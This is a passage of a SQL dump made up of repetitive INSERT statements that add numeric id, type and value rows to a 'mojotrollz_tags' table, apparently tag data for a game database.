`value`, `comment`) VALUES (16850, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16850, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16851, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16851, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16851, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16851, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16852, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16852, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16852, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16852, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16853, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16853, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16853, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16853, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16854, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16854, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16854, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16854, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16855, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16855, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16855, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16855, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16856, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16856, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16856, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16856, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16857, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16857, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16857, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16857, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16858, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16858, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16858, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16858, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16859, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16859, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16859, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16859, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16860, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16860, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16860, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16860, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16861, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16861, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16861, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16861, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16861, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16862, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16862, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16862, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16862, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16862, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16863, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16863, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16863, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16863, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16863, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16864, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16864, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16864, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16864, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16864, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16865, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16865, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16865, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16865, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16865, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16866, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16866, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16866, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16866, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16866, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16867, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16867, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16867, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16867, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16867, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16868, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16868, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16868, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16868, 3, 20, 3, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16868, 3, 21, 30, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16897, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16897, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16897, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16897, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16897, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16898, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16898, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16898, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16898, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16898, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16899, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16899, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16899, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16899, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16899, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16900, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16900, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16900, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16900, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16900, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16901, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16901, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16901, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16901, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16901, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16902, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16902, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16902, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16902, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16902, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16903, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16903, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16903, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16903, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16903, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16904, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16904, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16904, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16904, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16904, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16905, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16905, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16905, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16905, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16905, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16906, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16906, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16906, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16906, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16906, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16907, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16907, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16907, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16907, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16907, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16908, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16908, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16908, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16908, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16908, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16909, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16909, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16909, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16909, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16909, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16910, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16910, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16910, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16910, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16910, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16911, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16911, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16911, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16911, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16911, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16912, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16912, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16912, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16912, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16912, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16913, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16913, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16913, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16913, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16913, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16914, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16914, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16914, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16914, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16914, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16915, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16915, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16915, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16915, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16915, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16916, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16916, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16916, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16916, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16916, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16917, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16917, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16917, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16917, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16917, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16918, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16918, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16918, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16918, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16918, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16919, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16919, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16919, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16919, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16919, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16920, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16920, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16920, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16920, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16920, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16921, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16921, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16921, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16921, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16921, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16922, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16922, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16922, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16922, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16922, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16923, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16923, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16923, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16923, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16923, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16924, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16924, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16924, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16924, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16924, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16925, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16925, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16925, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16925, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16925, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16926, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16926, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16926, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16926, 3, 20, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16926, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16927, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16927, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16927, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16927, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16927, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16928, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16928, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16928, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16928, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16928, 3, 21, 40, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16929, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16929, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16929, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (16929, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, 